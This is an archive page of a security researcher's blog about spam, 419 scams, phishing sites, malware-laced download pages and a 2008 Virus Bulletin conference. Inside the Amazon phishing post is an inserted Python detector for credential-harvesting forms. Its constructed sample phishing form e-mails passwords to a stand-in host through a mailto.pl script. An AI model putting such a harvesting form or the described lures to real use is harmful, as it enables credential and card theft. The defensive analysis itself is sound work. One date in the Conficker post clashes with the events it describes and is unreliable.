MoMusings

Random ramblings and musings about all things malware and related net-nasties...

Tuesday, 19 May 2009

Spam on Twitter = Twam?

I've no idea how many of you out there in blog-land use Twitter, but I'd guess quite a few of you do?

As a relatively new Twitter user, I've not seen much of the problems that Twitter has experienced over the last year, including account hacking, phishing, 419 scams, worms and other malcode problems. One area that seems (at least to me) to have been rather quiet has been spam via Twitter.

Until the last week or so, I had never received any. I'd be interested to know how many of you out there in blog-land who use Twitter have seen anything similar to what I'm about to discuss.

I don't think there is a specific name for Twitter spam, so I've coined one: Twam.

I'm sure the more creative of you out there can come up with something better?

Let's have a look at a couple of examples I've seen in the last week or so:

1. The Vote For Me Twam
I received the following notification and when I checked out the profile for that user all their tweets were requests to vote for them in some beauty pageant.



As you can see, at the time I was sent this they had a fair few followers and were following (Twamming) lots of other Twitter users. When I checked this particular account again this morning it was still active and still only begging you to vote for her, at 60p per text no less! The number of followers now stands at 343 and she is following (Twamming) 1,986 other Twitter users.

2. The Porn Advertising Twam
I received the following notification just this morning, and when I checked out the profile for that user they had only one tweet, with a link to a porn site! So they seem to be using Twitter to advertise their porn site.



Shortly after receiving the above notification, I received another using the same name, but from a different Twitter account. Their feed was exactly the same as the first one I received just 30 minutes earlier.

When I checked both of these porn-advertising accounts just now (before publishing this), they had been closed by Twitter.

Needless to say I have blocked these Twitter accounts, as I don't want to see what they offer and I don't want to give them any credibility by being seen as being followed by them.

I wonder if this is the start of a major spam (twam) attack on this social networking site? I wouldn't be surprised, as this fate has already befallen Facebook, Myspace and many other similar sites.

For those of you who are interested in following me on Twitter (no not you spammers/twammers) you can easily find me via my name or my Twitter account which is talkytoaster.

If you spot anything interesting feel free to send me a Tweet or a Direct message.

Take care and happy Tweeting.


Friday, 8 May 2009

FREE GALA BINGO E-MAIL LOTTERY PROMO

The 419 scammers have decided to use Gala, a UK bingo and online gaming company, as their latest brand to impersonate; they do this to try and get you to swallow their scam as real.

Here are a couple of screenshots showing one copy of the e-mails I've seen so far today:





The use of a "trusted" brand name is meant to make it more believable, so that you will be willing to actually contact them to try and get the alleged winnings.

However, you'll end up on a suckers list, receiving even more of these scams, even via the postal service and over the phone too. Not only that, you will also be asked to pay some administrative or legal fees to release the money to you... there is no money; you haven't won anything except the chance to be less gullible in the future.

If you want to find out more about these scams and how they work, you can find other postings on the subject on this blog, and also on my published papers and articles page here: http://momusings.com/papers

If you get an e-mail claiming that you've won something in a competition you never entered, be very skeptical. If you want to know whether it is real or not, then please feel free to contact me.

Gala do appear to have a lottery game, but it is online at their website; they don't do an e-mail lottery at all... you have been warned ;-)


Monday, 27 April 2009

Look here Kido, stop trying to Conficker my computer...

Yes, I know I haven't posted for ages, but I've been kind of busy helping customers with outbreaks, ethical hacking, application testing and computer forensics. I have also been busy writing an article for a magazine (more on that in a moment) and writing abstracts for the 2009 Virus Bulletin conference, one of which was accepted; I'll blog about that when I have more time.

OK, enough of the lame excuses from me.

So, back to the article...

Over the last few months one particular malware family has been hyped out of all proportion and unless you've been living under a rock or had no access to a computer since the end of November you must already know which malware family I'm writing about?

At the beginning of March this year, after spending a significant amount of time dealing with the most virulent variant at that time, the B variant (or variants), I was asked to write an article for a magazine on Conficker, which I duly did.

It was submitted, and I'd made it clear that there was no way my employer would willingly waive its copyright. So, what do I get asked to sign?

So, to cut a long story short, it was agreed that the article would not be published by the magazine after all, but I could publish it on my blog, etc., as long as my employer's copyright of the material was mentioned.

The upshot of this is my article on the evolution and functionality of Conficker. Please bear in mind that this was completed on the 9th of March 2008, weeks before every man and his cerberus had decided they ought to write such an article.

I hope that you find it useful, enlightening and maybe entertaining too?

The article entitled "Have you been Confickered" can be found here: http://momusings.com/papers/Have-You-Been-Confickered-v1.01.pdf

As usual all feedback is most welcome.


Tuesday, 24 February 2009

Discount Coupons from Hell...

We all like a bargain, right?

How many of you out there use coupons to get discounts on things you buy, or plan to buy?

Do you use the paper coupons that you get from flyers, papers, magazines and brochures, or do you use the electronic coupon codes instead?

Whichever you use, I'm sure that you all love the feeling that you've saved some of your hard-earned money by using them? Of course the cynics amongst us would say it is just social engineering to get us to buy a particular brand, or even buy something we didn't really plan to buy, or in some cases even need... So, whilst I'm on this topic, I was intrigued when I received the following e-mail yesterday.

Here's a screenshot of one of the e-mails I've received:



Oh goody I thought, coupons! ;-)

I clicked on the link and this is where I ended up:



Now that's interesting, how have they managed to show me offers for a town near where I live?

A quick look at the page source shows that they are using GeoIP [geographic resolution of the IP address used to request the page, in other words my router's public IP address].

So, if you are in, say, Manchester, UK you would be shown offers allegedly tailored for that area; likewise if you are in, say, San Diego, US, or Munich, Germany, or even Sydney, Australia.

More digging shows that the page is also laced with exploit code [loaded via a hidden IFRAME], to catch the un-patched and infect their systems.

So, what happens when I click on the 'Click Here' icon on the page?

Ah, I get offered an executable file [list.exe], not a PDF or any real coupons at all: a Windows binary that I suspect is actually malware, probably a new variant of Waledac. So let's refresh the page and see if anything changes.

Yes, the filename offered changes; after the page reload it became saleslist.exe! More page reloads show that it is using a number of different names in rotation. So, I scanned the files [both of them] and they are identical in size and MD5 hash, which means they are identical internally.

At the time of posting this blog entry the detection of the offered files was rather poor, with only 9 out of 32 tested scanners identifying that this is a malicious file. Most of the ones that did detect it were using heuristic or generic detection, which means this is indeed a new variant.

So it seems that once more the bad guys and girls are trying new social engineering techniques to try and get us to infect our systems and effectively press-gang them into the botnet army they control. These are the same group of cyber-criminals responsible for the Valentine's Day fake e-card development kit that I blogged about recently.

Here are some useful links if you want to know more about Waledac [please bear in mind that the descriptions used may not be valid for this new variant]:


Don't let your guard down just because you think you are getting a good deal: some free coupons, a free iPod, laptop, or whatever... Just remember there is no such thing as a free lunch; someone has to pay for it, either directly or indirectly. Don't let it be you...

UPDATE:
As I was finishing off this blog entry, I re-checked the site and found that the files offered still use the same list of names [15 so far], but the file size and MD5 hash value are now different to yesterday's. It seems they are seeding new variants each day... so, be on your guard!


Tuesday, 10 February 2009

Another Valentine's Day...

...Another Chance to Get Infected!

I hope that you are all ready for a safe and pleasant, if not wonderful, Valentine's Day on Saturday?

It seems that the bad guys and girls are back playing cupid and couldn't resist the opportunity to try and get you to infect your computer, yet again using the guise of a Valentine's e-card. The latest wave of these started yesterday.

Here's a screenshot of one of the e-mails I've received:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like the one below, at least for now it does:



Very nice of them to offer you a tool to make your own Valentine's Day greetings? Of course, in reality it is just an infected file used to recruit your PC into the botnet army of the author of this malcode.

When I first started to see these Valentine's Day e-mails, late last week [a test run maybe?], the landing page looked like this instead:



However you spend the day, whatever you do for the 'love-of-your-life', don't become part of the collateral damage of the annual 'Valentine's Day [Malware] Massacre'.

If I see any more 'bogus' Valentine's Day e-mails, I'll try and post details here when I can. Also, if you see any that I haven't yet posted about, then please let me know.

Hopefully, between us we can try and keep the annual massacre down to a mere scuffle! ;-)

At the time of posting this blog entry the detection of the offered files [at least two distinct files, by MD5 hash value] was very poor, with only 4 out of 32 tested scanners identifying them as malicious.

Furthermore, the download is offered under different file names, although the actual file is internally identical in many cases, as mentioned above.

If I get any further useful data or news then I'll try and post it here.

Oh, and don't forget the risk of getting an infection isn't just for Valentine's Day, it is for every day of the year; don't let your guard down... stay safe!


Wednesday, 4 February 2009

McDonald's Survey

I'd like to start this post with an apology [yes, again] as I have been rather slack in posting for quite a few weeks now. This has been due to a number of issues beyond my control including yet another change in my role. I still hope to post material here as often as I can, but it probably won't be as frequent as it has been. So, to try and start the ball rolling once more I have the following phishy tale for you to enjoy.

Here's a new one I've not seen before, the following e-mail arrived in my 'Phish' inbox late last night [screenshot below]:



That's nice: if I answer just seven questions in a simple survey I will get £25... I smell a phish, so what do we see when I click on the link?



Hmmmmm... looks pretty good, quite believable, wouldn't you say?

So, let me see what happens when I fill out the details with bogus data. First let me enter some bogus data for the survey and then click on submit. This is where I'm taken to next:



Aha... just as I suspected, this is a phish, as it wants personal data and my credit card data, including the CVV, so that the promised £25 can be credited to my card; yeah right. So, let me enter some more bogus data and click on the Submit button again.

I particularly like the misuse of the MasterCard SecureCode, VeriSign and Verified by Visa logos, just trying to make you feel secure; how reassuring, eh?




The final page [shown above] informs me that my data has been entered correctly [yeah right!] and that I should see my £25 credit payment on my credit card within 3-5 business days. More like my credit card will be misused or sold on to others to misuse within 3-5 business days! Oh, and then I get taken to the real McDonald's UK website, nice ;-)

So, it seems that I was right to be suspicious, in fact a quick look at the link in the original e-mail made it obvious to me that this was a phishing scam.

The interesting thing about this phishing attempt is that this is the first time I've seen one targeting McDonald's in the UK.

So, if you are a McDonald's customer, or think that you'd like £25 for free, be on your guard, as it seems that the phishers are now spending significant amounts of their time finely targeting their potential victims to try and get you to disclose your details...

As a final note, the Netcraft toolbar plugin which works with Internet Explorer and Firefox now has the domains used for this phish in their database. So, install it and use it, it could save you from making an expensive mistake!


Tuesday, 21 October 2008

Financial In-Fidelity, Yours For 72.5 Million US Dollars!

Here's an offer I received via e-mail that seems to be the answer to most people's prayers: a large pile of money just for helping someone move some money. Of course in reality it isn't as simple as that, but I'm getting ahead of myself.

Here's a screenshot of the e-mail in full:



It says it was sent by Tim McCarron of Fidelity Investments here in the UK. He is a fund manager for them. It seems that Tim, allegedly, has acquired over 145 Million US Dollars from his employers without their knowledge. Moreover he wants my help to move the funds, and for my trouble he will give me 50 percent; very generous. That is over 72.5 Million US Dollars.....tempting, isn't it? ;-)

All he wants from me are some personal details, some proof of identity, such as a copy of my driver's licence or passport, and a bank account number to use for the transaction.

To prove that he really exists, Tim has even included a link to some details about himself and his performance, which is available on the Fidelity Investments website. How thoughtful!

Here's a screenshot of the webpage in the first link:



See, there's Tim's name and various other details about him and the funds he manages. Yes, this is the real Fidelity Investments website.

Let's look into this in more detail.

OK, the e-mail reply address seems odd: it is timmacarron@superposta.com (seems Tim can't even spell his surname correctly), but the From: address header in the e-mail tells me his e-mail address is tmcarron@ymail.com... hmmm, I'm confused. I know he is trying to cover his tracks, but why use two free webmail addresses?

So, what does this tell me?

Well, for one, this e-mail is not from the real Tim McCarron, or from anyone at Fidelity Investments. Furthermore, there is NO MONEY; sorry to disappoint you.

If it were real, then the person responsible would have committed fraud, as they would have stolen money from their employers and potentially customers too. Furthermore, if you took part in this, if it were real, you would also be committing fraud as well as money laundering... lucky there is no money then, eh? ;-)

Yes, this is yet another 419 scam [aka the Nigerian scam, also known as Advance-Fee Fraud]. If you were foolish enough to reply to the e-mail you would be assured that the money was real, but somewhere along the way you would be asked to part with money to pay for things such as handling fees, taxes, shipping fees, and maybe even bribes! So, instead of getting the alleged money you were promised, you would end up losing money, or worse. You would also end up on a so-called "suckers list" and get more 419s, not only via e-mail, but also through your letterbox.

So next time you receive such a tempting offer, remember the old adage "if something seems too good to be true, it probably is... too good to be true". Also, think very carefully before you click on any links or contact anyone mentioned in these e-mails: at the very least you could end up on a phishing site, you could lose some of your money, or worse, as there have been cases of beatings and even murders linked to these scams.

Oh, and just in case you were wondering, the links in the email were included by the scammer to try and give extra credence to their outlandish financial proposal.

If you want to read more on the subject of 419s then I have written several articles which were published in the Virus Bulletin magazine, reprints of these can be found here, [http://momusings.com/papers] along with all my other published articles and papers.

Oh yes, and the personal details you supply them will almost certainly be used for identity theft and/or in another 419 scam, using your personal details and proofs to attempt to make it more believable.


Amazon Marketplace Listing Canceled...

How many of you out there use Amazon's Marketplace to sell items?

Well, if you do then this posting should be of some interest and I'd also be interested in how many of you have received similar emails to the one shown in the screenshot below:



Looks like a typical notification from Amazon that your item listed on Amazon Marketplace has been canceled; for those that use this Amazon service this usually happens when your item listing has expired, and is quite normal.

So, let me see where I end up when I click on the link contained in the e-mail; screenshot below:

 

Is this Amazon.co.uk? It looks genuine, doesn't it? Would you sign in via this page, or not?

For the moment, let us assume [quite rightly] that I'm suspicious of this page, and have a look at the source HTML for the page above; I'm especially interested in the FORM section (the bit that deals with the login credentials: your e-mail address and Amazon.co.uk password). Here's a screenshot of the related part of the HTML source:




Hmmm... notice anything odd?

Surely the real Amazon.co.uk doesn't use a generic mailto CGI script [in this case a Perl script] to handle login routines, does it?

No, of course it doesn't. The code in the screenshot above sends your now-stolen Amazon.co.uk login details to the bad guys and girls via e-mail, using the mailto.pl script hosted on http://www-cgi.paonline. It then goes on to send you to the real Amazon.co.uk page; sneaky, huh?

So, this is another phishing scam; in this case they want to steal your Amazon login credentials so that they can steal any personal details, including any stored credit-card data, or maybe they just want to buy things using your account and have them sent to a drop-box to then be turned into cash, such as ordering themselves a new MP3 player, phone, some CDs or DVDs or whatever, leaving you to pick up the bill and deal with the resulting mess.

Of course this type of attack is not just limited to Amazon; it would in theory work with any e-commerce site, so be careful out there, especially with sites that store your credit-card details, as in most cases this is what the bad guys and girls are after. If they can't get that then they will just buy things from the site using your stored card data instead.

Yet again, as with other recent examples I've blogged about, it shows that phishers are not just interested in getting your bank details; they are just as happy to get e-commerce site credentials, game login credentials (such as WoW) or webmail account details (how many of you store e-mails which contain personal or financial details?), amongst many others. Furthermore, do you use the same password for more than a single site? If you do then you are making it easier for the bad guys and girls to compromise your other accounts, wherever they may be.
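As an added illustration (my own code, not the blog's or anything from the phishing kit), here is a Python check for the tell-tale signs of the form described above: a login form that posts off-site to a generic form-to-mail CGI, with hidden fields naming the mail recipient and the genuine site to bounce the victim to afterwards. The page URL, host names, e-mail address and FormMail-style hidden field names are constructed assumptions.

```python
"""Flag the tell-tale signs of a credential-harvesting login form.

For every <form> on a page that contains a password field, report when:
  1. the form posts to a different host than the page it lives on;
  2. the action path is a generic form-to-mail CGI (mailto.pl etc.);
  3. hidden fields name a mail recipient or a post-submit redirect, which is
     how such scripts are told where to e-mail the data and where to bounce
     the victim afterwards (here: on to the genuine site).
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Script names typical of generic form-to-mail CGIs (assumption, not exhaustive).
MAIL_CGI_NAMES = ("mailto.pl", "mailto.cgi", "formmail.pl", "formmail.cgi")
# Hidden-field names such scripts read (assumption: FormMail-style conventions).
RECIPIENT_FIELDS = ("recipient", "recipients", "mailto", "email_to")
REDIRECT_FIELDS = ("redirect", "return_url", "thankyou_url", "next")


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # bare attributes arrive as None
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": a.get("type", "text").lower(),
                                            "name": a.get("name", ""),
                                            "value": a.get("value", "")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_of(url):
    """Lower-cased host name of a URL, or '' if it has none."""
    return (urlsplit(url).hostname or "").lower()


def analyze_login_page(page_url, html):
    """Return a list of human-readable findings for password-collecting forms."""
    parser = FormCollector()
    parser.feed(html)
    page_host = host_of(page_url)
    findings = []
    for form in parser.forms:
        if not any(i["type"] == "password" for i in form["inputs"]):
            continue  # not a login form, nothing to judge
        action = urljoin(page_url, form["action"])  # resolve relative actions
        action_host = host_of(action)
        script = urlsplit(action).path.rsplit("/", 1)[-1].lower()
        if action_host and action_host != page_host:
            findings.append(f"credentials posted off-site: {page_host} -> {action_host}")
        if script in MAIL_CGI_NAMES:
            findings.append(f"action is a generic form-to-mail CGI: {script}")
        for i in form["inputs"]:
            if i["type"] != "hidden":
                continue
            name = i["name"].lower()
            if name in RECIPIENT_FIELDS:
                findings.append(f"hidden mail recipient: {i['name']}={i['value']}")
            elif name in REDIRECT_FIELDS:
                findings.append(f"post-submit redirect to {host_of(urljoin(page_url, i['value']))}")
    return findings


# Constructed sample: a look-alike sign-in page whose form posts to a
# form-to-mail Perl script on another host, then bounces the victim to the
# genuine site. All hosts, addresses and field names here are made up.
SAMPLE_PAGE_URL = "http://signin.amazon-co-uk.example.invalid/signin.html"
SAMPLE_HTML = """
<html><body><h1>Sign in</h1>
<form method="post" action="http://www-cgi.example.invalid/cgi-bin/mailto.pl">
  <input type="hidden" name="recipient" value="collector@example.invalid">
  <input type="hidden" name="redirect" value="https://www.amazon.co.uk/">
  E-mail: <input type="text" name="email">
  Password: <input type="password" name="password">
  <input type="submit" value="Sign in using our secure server">
</form></body></html>
"""

if __name__ == "__main__":
    for finding in analyze_login_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("suspicious:", finding)
```

A genuine sign-in form that posts back to its own host with no hidden recipient or redirect fields produces no findings, which is the baseline this check compares against.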


Friday, 17 October 2008

Yahoo Calendar Invites Trouble...

Well, I received a rather interesting invite sent to me via the Yahoo! Calendar service. Have a look at it [screenshot below], what do you think?

 

Hands up all those that are tempted to respond to this?

OK

Now, hands up all those that are NOT tempted to respond to this?

Hmmm....

So, before I cover this in more detail, let me see what happens when I click on the "RSVP to this invitation" text, which is a hyperlink. This is where we end up [screenshot below]:



This is the real Yahoo! Calendar website, so it isn't a phishing scam, is it? Is it real? Does someone really want to give me a cheque for 1.5 Million US Dollars, or is it some other form of scam?

OK, time to tell you what is going on here, and what the e-mail is all about, and why the sender used Yahoo! Calendar to send it.

The email really was sent via the Yahoo! Calendar service, and clicking on the link contained in the e-mail really does take you to the genuine Yahoo! Calendar site and a real Yahoo! Calendar invite. But why?

The answer to the why is that this enabled the e-mail sender to have a better chance of getting the e-mail, seen in the first screenshot, to the intended recipients; yes, I said recipients, not recipient. Did you notice the "90 undecided" text in the website screenshot? Yes, this invite was sent to 90 intended recipients, not just me. Does this mean that this was sent by someone with over 135 Million US Dollars to give away?

Of course not; this is just a new twist on the old 419 scam [aka the Nigerian scam, also known as Advance-Fee Fraud]. The sender just used the Yahoo! Calendar service to try and increase the chances of his invite [the scam text in the invite] getting past any anti-spam defences that the intended recipients might have in place.

There is no money [sorry!], there never was. If you were foolish enough to contact Mr Luke Yayi, you would be assured that the money was real, but somewhere along the way you would be asked to part with money to pay for things such as handling fees, taxes, shipping fees, and maybe even bribes! So, instead of getting the alleged money you were promised, you would end up losing money, or worse. You would also end up on a so-called "suckers list" and get more 419s, not only via e-mail, but also through your letterbox.

So next time you receive such an invite, and not only from a calendar service (it could be from any online service, such as news groups, blogs, social-networking sites, feedback forms, mailing lists and so on), think very carefully before you click on any links or contact anyone mentioned in the invite or e-mail body. At the very least you could end up on a phishing site; at worst you could lose money, or worse, as there have been cases of beatings and even murders linked to these scams.

If you want to read more on the subject of 419s then I have written several articles which were published in the Virus Bulletin magazine, reprints of these can be found here, [http://momusings.com/papers] along with all my other published articles and papers.

Right, I need to put together another presentation for yet another conference, this time I'm covering penetration testing and ethical hacking.


Thursday, 16 October 2008

Virus Bulletin 2008 Conference Review

As previously mentioned on this blog, I was going to attend the Virus Bulletin 2008 conference as just a delegate, for the very first time; I usually attend as a speaker. The conference was held at the Westin Ottawa, in Ottawa, Canada [surprisingly ;-)] between the 1st and 3rd of October.

However, I ended up being a speaker again, which I don't mind, but I was actually looking forward to having a more relaxed conference than I usually do; but that's life!



This posting is a quick review of the conference:

Day 1 - Wednesday 1st October 2008

The first day of the conference started at 10:30 with Helen Martin's opening address; this was followed at 11:00 by the keynote address "The AV industry: Quo Vadis?" presented by Alex Eckelberry of Sunbelt Software. This was a very interesting speech and contained lots of useful information, as well as a general overview of what the bad guys [and girls] are up to, and what the good guys [and girls] are up to too.

You can find a recording of it here, along with the slides: http://sunbeltblog.blogspot.com/2008/10/virus-bulletin-2008-keynote-address.html

The final session on the Technical Stream before lunch was also interesting: a presentation by Morton Swimmer [who used to work for IBM] entitled:

  • Towards integrated malware defence

It was a good presentation; however, as Morton had moved to TREND just before the conference he no longer had access to all his data, which was a shame, as it seems to have been rather an effective solution.

Then it was time for lunch.

After lunch, the conference continued in its normal two-stream mode: Corporate Stream and Technical Stream. Normally I spend most of the conference in the Technical Stream, and on this first day that was pretty much the case; I spent the whole afternoon there.

The first two presentations after lunch were:

  • Your computer is now stoned (...again!). The rise of MBR rootkit - Kimmo Kasslin, F-Secure
  • When the hammer falls - effects of successful widespread disinfection on malware development and direction - Matt McCormack, Microsoft

The presentation given by Kimmo was especially interesting, as it covered the rebirth of MBR infectors; something that had almost died out when Windows NT, 2000 and XP came along [yes, there have been some MBR infectors for those, but not many, and not with stealth capability].

Then we had a short break for tea and coffee before attending the final pair of presentations on the Technical Stream. These were:

  • Applying user-mode memory scanning on Windows NT - Eric Uday Kumar, Authentium
  • Packer visualisation: a fast entropy scanning algorithm that preserves local detail - Li Sun, RMIT University

I decided to sit in on the vendor presentation after the day's main proceedings; this was given by my good friend David Harley, from Eset.

Later we had the "Welcome drinks reception" which is a nice ice-breaker, especially for those that have not been to a VB Conference before as it is very informal and relaxed.

This was staged with a couple of ice hockey players, for those that wanted pictures, as well as a bit of fun from Ken Bechtel, whose hat did the rounds; photos were taken of those that ended up wearing it, including me. If you've ever met Ken, you'll know which hat I mean, as he is rarely seen without it.

Day 2 - Thursday 2nd October 2008

Day two started early for me as I was informed when I arrived that I might be needed to present [I was the emergency reserve speaker; "in case of a missing speaker, break glass and grab Martin ;-)"], as one of the speakers for the morning session on the Technical Stream was unaccounted for; he never did turn up.

So, I had to go back to my hotel [I wasn't staying at the Westin], get changed, grab my laptop and get back to the conference by the morning tea break to check that my laptop worked fine with the projector, it did.

This meant that I effectively missed the first two presentations I had planned to attend, oh well.

To complicate matters, I was also supposed to be chairing the three sessions on the Corporate Stream between the morning tea break and lunch; which I couldn't now do, as I was presenting in the other stream at the same time. Luckily, my old friend from Nortel, John Morris, stepped into the void as the new session chair.

So after the morning tea-break I was back in the Technical Stream for the next three presentations, these were:

  • The robustness of new email identification standards - Reza Rajabiun, COMDOM Software and York University
  • Coordinated distributions method for tracking botnets sending out spam - Andrey Bakhmutov, Kaspersky Lab
  • Malware forensics: detecting the unknown - Martin Overton, IBM ISS

The presentation given by Andrey was extremely good: some excellent research which was well presented and explained. This led to a flurry of questions.

It seemed rather surreal when I gave my presentation, as it was designed for an audience on the Corporate Stream; so as an old English saying goes "it was like teaching my grandmother how to suck eggs". In other words the presentation was an overview of forensic techniques and tools for finding and analysing malware [known or new] on an infected system.

This was presented on the Technical Stream to about 70 or more of the world's best malware researchers, hence my use of the saying.

The presentation was actually based on my EICAR 2008 paper which I was unable to present at the EICAR conference, ironically due to the fact I was tied up in a malware forensics case.

Then it was time for Lunch, not only to refuel with food, but also to discuss and digest what we'd seen so far.

I received some nice feedback from a few of those that sat in, and no awkward questions. In fact one of the guys who were running the audio-visual side of the conference said he thoroughly enjoyed my presentation and found it most useful and enlightening.

After lunch, once more I decided to sit in on the Technical Stream until the tea/coffee break, at least. The next four presentations, all last minute ones limited to 20 minutes each, were:

  • VB testing - present status, future plans, John Hawes, Virus Bulletin
  • Race to zero with online scanners, Boris Lau, Sophos
  • There is (some) honour among South American authors of infostealer trojans!, Pedro Bueno, McAfee
  • Apple iPhone programming with SDK, Marius van Oers, McAfee

This year these short technical presentations worked rather well, although it was hard for some of the presenters to keep to the 20 minute slot limit; yes, you know who you are.

Then it was time for another caffeine break ;-)

After the tea/coffee break I moved to the Corporate Stream as I was chairing the last two presentations on that stream, these were:

  • The NorTel Mailer: effective open-source spam filtering for enterprises - Chris Lewis, Nortel
  • SCADA security - who is really in control of our control systems? - Peter Allor, IBM

Both of these were very interesting presentations and it was a shame that so few delegates had decided to sit in on them.

Before the day was over we also had our first panel session, this was:

  • The state of anti-malware testing

Later we had the "pre-dinner drinks and the Gala dinner and entertainment".

As always the food was excellent and the entertainment this year differed quite a bit, it was a quiz, which was fun but took longer than expected to complete. As one delegate was heard to say "we have travelled 3,500 miles for a pub quiz!". Personally, I enjoyed it, it just needed to be shorter.


Day 3 - Friday 3rd October 2008

The final day of the conference had arrived, I'm still not sure where the first two days had gone, but they sure went quickly!

As we started slightly later on the last day, to allow those that had partied hard until the small hours to get some sleep, and maybe quite a bit of black coffee, there was only a single presentation before the first coffee/tea break of the day. The one I decided to attend was on the Corporate Stream, again:

  • Understanding and teaching bots and botnets - Randy Abrams, ESET
This presentation covered a topic that I had presented on back at VB2005 in Dublin, but from a high-level perspective and more focussed on how to educate staff about these threats by using the robot vacuum cleaners known as Roombas.

As usual Randy was both informative and entertaining.

So, another quick tea and coffee break and then back to the Technical Stream until lunch, these were the next presentations I sat in on:

  • Automatic rules-based binary analysis with IDA Pro and CLIPS - Ryan Hicks, AVG
  • Rebuilding testing for the future - Igor Muttik
  • Samples.malware.org: sample sharing for the next decade? - Richard Ford, Florida Institute of Technology
All of these were very good and interesting talks and all generated lots of discussion and questions.

Then it was time for the final lunch of the conference, but before that, all the speakers had to get together for the traditional "Speakers Photo". As usual, much hilarity was had by all. However, I think I can honestly say that this year's photo was the quickest ever as it took less than 5 minutes to organise all the speakers and take a number of photos.

After lunch I spent the first part of the afternoon on the Corporate Stream. These were the presentations I sat in on:

  • Where do your users want to go today and can you stop them? - Bruce Hughes, AVG
  • The name of the dose: does malware naming still matter? - Pierre-Marc Bureau and David Harley, ESET
Both of these were interesting and prompted a number of questions from the audience.

Then it was time for the final refreshments break. Yes, it was the very last VB2008 Tea and coffee break of the whole conference.

The final presentations of the day, and the conference, were straight after the break and I decided that I'd sit in on the last one on the Technical Stream again. This was:

  • Darwin inside the machines: malware evolution and the consequences for computer security - Peter Ször, Symantec
    Dimitris Iliopoulos, Keck Graduate Institute of Applied Life Science
This was a very interesting presentation, basically saying that malcode could in theory evolve following Darwinian principles. Not sure that we will see such malware any time soon, as there are a number of things that need to happen first.

Although all the conference paper presentations had finished, there was a very interesting and lively panel discussion on:

  • Security in banking forum
Finally it was time for the Conference closing session, once more led by Helen Martin, the editor of Virus Bulletin.

It included the usual selection of scenic photos as well as general candid shots taken during the conference, including some 'comic' ones. This year it seemed to be another case of "I'm Spartacus", as a lot of people seemed to be wearing Ken Bechtel's hat, including me, and no it wasn't him in varying disguises either!

My final impressions of VB2008 are mixed; I enjoyed it, but I [and others who I chatted with] seem to think it may have lost its edge. Is this a case of becoming too commercialised or due to a lack of the usual swathe of quality research papers [which may be due to security companies cutting research budgets], or is it just a sign of the times as the marketplace has matured and that threats have now converged?

If you attended VB2008 and have an opinion, then please let me know your thoughts, thanks.

Copies of the slides used by the speakers during the presentations can be found here: http://www.virusbtn.com/conference/vb2008/slides

The full agenda for the conference can be found here: http://www.virusbtn.com/conference/vb2008/programme/index

Finally, if you are really curious and want something to put you to sleep, then you can also find a selection of scenic photos I took whilst in Ottawa, here: http://picasaweb.google.com/overtonm/OttawaCanada2008?authkey=SEeottY873o#

Well, that's another VB conference covered, I'm already looking forward to the possibility of attending next year, where it will be in Geneva, Switzerland at the end of September 2009. Right, now I need to find some ideas for a few abstracts to submit....any suggestions?


Thursday, 25 September 2008

Virus Bulletin 2008 International Conference

Next week the Virus Bulletin International Conference is being held in Ottawa, Canada [1st to the 3rd of October]. This is the premier conference for people involved with fighting malware and related security threats. The programme can be found here.

This year I was going to be there just as a delegate; normally when I attend this conference I attend as a speaker, which means I have to write a paper and present it at the conference to an audience of 50-200 uber-geeks from various industries as well as the world's best malware researchers. This can be pretty daunting! This will be my 11th Virus Bulletin Conference since the very first one I attended and presented at, back in 1996.

However, I've now been asked to be a reserve speaker, so I have to have a presentation ready, just in case I'm needed. The last time I was a reserve speaker it was for VB2002 which was held in New Orleans that year, and was nearly washed away by a hurricane! Needless to say, I ended up presenting my paper that year.

If any of you reading this are going to be there, then please feel free to stop me and have a chat, or just to say hello. I don't bite, honest ;-)

The presentation I am working on for the conference is to do with malware forensics, so it should be fun to do, as well as interesting for any audience I get; if I get to present it, that is.

As usual, I will write a short review of the conference, including what I personally found interesting, and may also post some mini-reviews and updates via Twitter.

If you can make it, then I hope to see you there; if not then stay tuned and I'll post a review as soon as I can.


Wednesday, 24 September 2008

American Airlines Survey

I'd like to start this post with an apology as I have been rather slack in posting for quite a few weeks now. This has been due to a number of issues beyond my control including yet another change in my role. I still hope to post material here as often as I can, but it probably won't be as frequent as it has been. So, to try and start the ball rolling once more I have the following phishy tale for you to enjoy.

Here's a new one I've not seen before, the following e-mail arrived in my 'Phish' inbox late last night [screenshot below]:



That's nice: if I answer five questions in a simple survey I will get $50..... I smell a phish, so what do we see when I click on the link?



So, let me see what happens when I fill out the details with bogus data. First let me enter some bogus data for the AAdvantage number and password, and then click on go. This is where I'm taken to next:



As you can see, I'm now asked for my Bonus Code and the rest of the page is the alleged survey. So, I'll fill this in, again using bogus data. Interestingly the Bonus Code is the same in all the copies I've received, to multiple e-mail honeypot addresses too. So, now all the data has been entered, let me click on the continue button and see where we go next.



Aha.....Just as I suspected, this is a phish, as it not only asks for personal details, it also wants credit card data, including the CVV and an ATM PIN number too. So, let me enter in some more bogus data and click on the continue button again.

The final page shown informs me that my data has been entered correctly [yeah right!] and that I should see my bonus of $50 on my credit card within 72 hours. More like my credit card will be misused or sold on to others to misuse within 72 hours!

For those of you who like the detail behind the web-page, here is a screenshot of the first page, showing that the actual page is being rendered from two other sites. You may also notice that this phishing site is hosted on Yahoo servers.



Here is a screenshot showing part of the whois record for the phishy domain being used as a front for this scam.



So, it seems that I was right to be suspicious, in fact a quick look at the link in the original e-mail made it obvious to me that this was a phishing scam.

The interesting thing about this phishing attempt is that this is the first time I've seen one targeting an airline; in fact I'd go as far as saying that this may be a 'Spear Phishing' attempt, as it seems to have been sent to a small number of people and in far smaller numbers than the more traditional bank phish I see day in and day out.

So, if you are an American Airlines customer be on your guard as it seems that the phishers are now spending significant amounts of their time to finely target their potential victims and try and get you to disclose your details....

As a final note, the Netcraft toolbar plugin which works with Internet Explorer and Firefox now has the domains used for this phish in their database. So, install it and use it, it could save you from making an expensive mistake!


Friday, 25 July 2008

FREE Anti-Virus Software...

